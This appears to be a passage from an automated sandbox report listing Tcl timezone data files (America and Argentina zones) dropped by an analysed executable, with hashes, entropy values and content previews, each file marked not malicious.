SHA-256:	DF136617165B77471C61A51B6D0AECEA7FBCFA3D83862BBB9733BD32073D57C3
SHA-512:	FDD602AECD195B96199F0A8B7041F160DA09400C4E6A56BB2BB94603378837150382490DAA8443FA6AD1FA0288A9913E3DF3E57E671933B69F721DB1EFEF5CD7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Antigua) {. {-9223372036854775808 -14832 0 LMT}. {-1825098768 -18000 0 EST}. {-599598000 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Araguaina Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6907
Entropy (8bit):	3.789967285899392
Encrypted:	false
SSDEEP:	192:lP+2+j+R+u+W+L+M+A+r+L+v+8+h+2+M+w+b+v+8+/+C+jZ+E+2+A+O+8R+G+Y43:Ecbb8B4
MD5:	E6F8DBD4BF73C7303F91EF92E9BDA8F9
SHA1:	DC92FDE74518D788111D01CBB881B37E46EC5F22
SHA-256:	13899639D3FC0D6B54661E5B35F0546A83FD84F9C8A9E0116791F683574F3714
SHA-512:	DC75600849457BE313FFB55B99036E2914CEEBA670724C366207FF227C399FCEFBBE5A2F3B1E1805C17E4C87F36619C357A3B976726BF9D381A11724E4D5F170
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Araguaina) {. {-9223372036854775808 -11568 0 LMT}. {-1767214032 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Buenos_Aires Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2010
Entropy (8bit):	3.9779263835893843
Encrypted:	false
SSDEEP:	48:5WcafJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwr:vEJaGK9+LUlT/uXgeVL+PRjG3dUXHg67
MD5:	2DDA63C37B5BDAB56F9250A98A53EACE
SHA1:	6CA1A502AD4D943A9F5E7824E48546BBD19C571D
SHA-256:	B808C84849A1D5D61F223B8A6155EDA91BA1E575C0B8CF4CDD0C499CF499C042
SHA-512:	E1A2F9B81A5ACAF0C6B30363074CDA524A341446F2C2F5F7010BBDA0F57BD8C131C31D28E23A4E62C06E3749B251F178C30C556F24B715D4B6558F09A8CEC137
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Buenos_Aires) {. {-9223372036854775808 -14028 0 LMT}. {-2372097972 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Catamarca Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2039
Entropy (8bit):	3.9634733329308918
Encrypted:	false
SSDEEP:	48:5f4fJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwR4:N+JaGK9+LUlT/uXgeVL+PRjG3dUXHQ33
MD5:	9F9AC2706BED81376AA10BFCFAD684DD
SHA1:	1FCB09ABDDFA9CFD2EA099B284A599E2CAAE3BF3
SHA-256:	69D8A30B3FD4AD2C5DC4545B81EFE322570D90B78FA2DAC85897AEF53842CFA9
SHA-512:	4713EC8CFB0123596F0F36DBAB3F23A1889872F2CA891FF6F9DE319C54AC47201C697ACD6B670DF2561A5635D605425BA812CA23F070E2ACE9E058FAA1804E0C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Catamarca) {. {-9223372036854775808 -15788 0 LMT}. {-2372096212 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\ComodRivadavia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	237
Entropy (8bit):	4.672788403288451
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MMXAIVAIgp/MMXs290/MquQ90/MMXAv:MBaIMY/Mhp/MP290/MquQ90/MH
MD5:	42D568B6100D68F9E5698F301F4EC136
SHA1:	E0A5F43A80EB0FAAFBD45127DCAF793406A4CF3A
SHA-256:	D442E5BBB801C004A7903F6C217149FCDA521088705AC9FECB0BC3B3058981BF
SHA-512:	99580239B40247AF75FFAA44E930CDECB71F6769E3597AC85F19A8816F7D0859F6A0D5499AFAC2FA35C32BA05B75B27C77F36DE290DD0D442C0769D6F41E96DA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca).

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Cordoba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2006
Entropy (8bit):	3.9677183425688307
Encrypted:	false
SSDEEP:	48:5zxpfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGws:1x9JaGK9+LUlT/uXgeVL+PRjG3dUXHQr
MD5:	61BA43D4E743A7C289D0DD4753AF5266
SHA1:	650558730C9E32A5F532CBA08147516304DE7023
SHA-256:	AD6E551ED3466EB78770620B79A72A4F145A6D587E2E0956E87BE110952252E1
SHA-512:	5CFC96CDF1D86CE95E14FABF5861FDCEEB0EC5A3B7A9A55D18163DF6B01FA1BDD0A876AB15C5828409ADC51B3A5A26AC4C1F875ECD32EB6CD8729B98E34DD72E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Cordoba) {. {-9223372036854775808 -15408 0 LMT}. {-2372096592 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Jujuy Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2005
Entropy (8bit):	3.973466609224067
Encrypted:	false
SSDEEP:	48:5rCfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRr:FcJaGK9+LUlT/uXgeVL+PRjG3dUXfrBV
MD5:	F54525F3F2427C9F752F3C5D3762CEA2
SHA1:	9A0C4779B04622D521884F1DDA88744E10A9B72E
SHA-256:	643BBFE9E8BDCF711AFD52BA189E675B3DD5B6A0E47E204F95EC5AC4BAD4B623
SHA-512:	AB2F99DC324D64CC42CE487A48AAC5096185A8531E0756551A0239D49A3CF8A7972F6858167A3864CFBEF3F13A15F47F99D10B04E78BEB33E3CDB3735FE245A5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Jujuy) {. {-9223372036854775808 -15672 0 LMT}. {-2372096328 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}. {

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\La_Rioja Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2067
Entropy (8bit):	3.961168755371772
Encrypted:	false
SSDEEP:	48:5J6fJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRU:HkJaGK9+LUlT/uXgeVL+PRjG3dUXHv63
MD5:	C4276571AC47CAB0A2866D228DB5356C
SHA1:	8088B248BD6801EF8A537A81F3BBD1AA72332889
SHA-256:	D94723529462DC8DDC82AF71268AD0EA1E5ABDD1AE56CF95C2787E6D55DFC366
SHA-512:	6B5198BD963CFC60B32328B427C937B562BFB7E9EE2B16077DA6AC7E8ED6AA8538A7B2353F501642B74378E29AEA2535CF89C2B71DCF25EE829EE8D097CD944F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/La_Rioja) {. {-9223372036854775808 -16044 0 LMT}. {-2372095956 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Mendoza Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2043
Entropy (8bit):	3.9713587246734114
Encrypted:	false
SSDEEP:	48:5YefJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRn:C4JaGK9+LUlT/uXgeVL+PRjG3dUXp9Im
MD5:	615EA020751D8AF717840FE95A5657A8
SHA1:	1B95B53EEAA3C19335EEDCB645237EC9B779A0E2
SHA-256:	9F4CD0AD99421209D3240F067F763C957B395D1ECC80881D51EFAE6DDEE0A375
SHA-512:	E83A7CCFBF5EA830A63E6C655611165FE4B260F13F7FB2234D6A9BA859C93CE6E32C2F691A10DBE07966A0D162D7CCACE0E8B1F66159660358E835FDF7832146
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Mendoza) {. {-9223372036854775808 -16516 0 LMT}. {-2372095484 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Rio_Gallegos Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2041
Entropy (8bit):	3.9709004305556337
Encrypted:	false
SSDEEP:	48:5mpfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRp:o9JaGK9+LUlT/uXgeVL+PRjG3dUXHg63
MD5:	E9C3978CF8824F03582C0C4DBB086138
SHA1:	854A28BA75715E35AC79A19875B510D87C102D36
SHA-256:	DE502BAF9DDD8BD775C1B4AC5681CD36C639ABC2A3D59579A89F6D3786FC6E27
SHA-512:	B8686E0D9FCF4783DF732676F5550EF30050CD20397086CE2DF77D935F64F02BAB8333C72D3B831627F322B9CF1289243E4B9E06BEB4F7668224B268E4CDF07A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Rio_Gallegos) {. {-9223372036854775808 -16612 0 LMT}. {-2372095388 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Salta Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1974
Entropy (8bit):	3.957678973420544
Encrypted:	false
SSDEEP:	48:5VgfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRi:72JaGK9+LUlT/uXgeVL+PRjG3dUXHQ3T
MD5:	9BC9148D20A804AB42732F1C13C28A1C
SHA1:	910E54C41F70CB3F51A5DF08016FCFCFA1083921
SHA-256:	262DFD69F14B658DC8B8786204973A225C4ABA8EDC2BF33B025B77BD97D1693C
SHA-512:	65FD9E9464402683FB8C4D97A512D50A7F19A0D53BC6B5CA0B2A30739DC4745CC178ACD0A02019E1B4587096F30C917D3B8FE0D3ED1883014D7AF90FD6AFD0AA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Salta) {. {-9223372036854775808 -15700 0 LMT}. {-2372096300 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}. {

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\San_Juan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2067
Entropy (8bit):	3.965568294539527
Encrypted:	false
SSDEEP:	48:5jXufJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGws:14JaGK9+LUlT/uXgeVL+PRjG3dUXHv6B
MD5:	C6CFB7423D26A86924BA8A86494A268D
SHA1:	68EC28EE2B8EFCC72E0875F968FE616FB71ED217
SHA-256:	09F1CE3527B5C3F8D58D79901B6129459D4DC1AEEF80F19338ECCF764668DFF3
SHA-512:	7C4835FDA7AA229E3AABE27F9AA1D1724B4CA6537E58035E1D60CFB446944FBD33BC806B64224B20CDC3315F8C6AE6F34B55D5333E5857AF6A34AD124CEF343B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Juan) {. {-9223372036854775808 -16444 0 LMT}. {-2372095556 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\San_Luis Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2052
Entropy (8bit):	3.9816705980879408
Encrypted:	false
SSDEEP:	48:58kfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRf:KaJaGK9+LUlT/uXgeVL+PRjG3dUXHLjD
MD5:	CEF249A57B470BABCC515865FD2E3A19
SHA1:	AFC88EA45BFE40C049F3704D0556816070783F0E
SHA-256:	A64FA78ED22A518ECBA3F4375726D70E2213DED8F24BD07251AF00D99F5A330E
SHA-512:	4515A5BC5D970B1F2C9C83962F993454D206C811F0AA6241C97475DCA6F5FEFBCE927A7BEDD9419FCE45D59110899D6D6344DFA73622141CD665B26ED0C6A42E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Luis) {. {-9223372036854775808 -15924 0 LMT}. {-2372096076 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Tucuman Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2067
Entropy (8bit):	3.9614731054580163
Encrypted:	false
SSDEEP:	48:5yM9EfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGI:b96JaGK9+LUlT/uXgeVL+PRjG3dUXHQA
MD5:	17200080F2840A40EEFB902AFFB858FF
SHA1:	B33794EB96EE42C555B32A2CEDD27ABE0224C7BC
SHA-256:	93B07C3BD7CE711650B3A21F413C7D5B952DAB03E0BAFAED687E676949A2EF6F
SHA-512:	060C2860E356631B293EE3EAAF9D71FEEB07B7D0A42211859CB8E4B99A1C812BD9AF079A82D4E55771A78FBF591D6B0D25FDC54F8DA2D2F594F0E9B213EA271F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Tucuman) {. {-9223372036854775808 -15652 0 LMT}. {-2372096348 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Argentina\Ushuaia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2036
Entropy (8bit):	3.9614879453725877
Encrypted:	false
SSDEEP:	48:56YfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRB:QeJaGK9+LUlT/uXgeVL+PRjG3dUXHg6P
MD5:	A254EF7A0166FBADB11644105C8E7BCA
SHA1:	30E6C33FA28691857CB0ACA4DB4B465FEA31A84A
SHA-256:	4E93A670621EBFD5FD996F8BC6C6C4121DE2D3CFAE221CB2A7C51C77428F99FF
SHA-512:	A28CD45CB352CBCC27C8BAE7B3D176C61526B763394DAAF5FB7A779DB51603290E3C2A3A3D922B70AA19ABB80FA1E4EED501D591F9E111CD6C19093BDAF7B9AC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Ushuaia) {. {-9223372036854775808 -16392 0 LMT}. {-2372095608 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

C:\Users\user\Desktop\tcl\tzdata\America\Aruba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.898934106142183
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE/nUXGm2OH5vkevUd57/FVFkEiQG3VFpRR/vwvYv:SlSWB9X5290/bm2OH58ey7/F8WUF/R/r
MD5:	D93B07F2D32C29DF52A7FC350C6CB5A1
SHA1:	223E79B37CA8F6A8ECE0BC6922164595B9A9265A
SHA-256:	9955C48CB1F52285E1FDAC6CB1CD4E461F74A380D66B9D75A2F3D6553873F126
SHA-512:	2C05E1EB4EA4D8722E9F9791F7EFDB9AC603BC8A28BB51B9171AE55E88A8B450D5E46C7FFB63EEAE06235BC74D761F844DD5F74D729B64BA3ABA127797AA4805
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Aruba) {. {-9223372036854775808 -16824 0 LMT}. {-1826738376 -16200 0 ANT}. {-157750200 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Asuncion Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7810
Entropy (8bit):	3.766817466650462
Encrypted:	false
SSDEEP:	192:5xEwkqiLgvyCZ1Q79FGs6R61Ec//nvRGoTcP5zzIhwrwsEW8dmsyoTrhxXrdCrQ3:5NBeQy
MD5:	9981F5B3F787131FCB96169B8CAD19A6
SHA1:	987B68F1597F932178E92F12D1A3431A923473D0
SHA-256:	99D494C820C9DD238CFA13775C8B4D8D8B401BD2EADA65F8B46CC75369FAA9C9
SHA-512:	763ACB02FDDA95065BE0C090FCF6BA7E515E97A6F33185E577F46C597C16B47653159EA0573ED1011B1F29979A0B9E94B9CA2BE688057BD231ECB35AA0399CD1
Malicious:	false
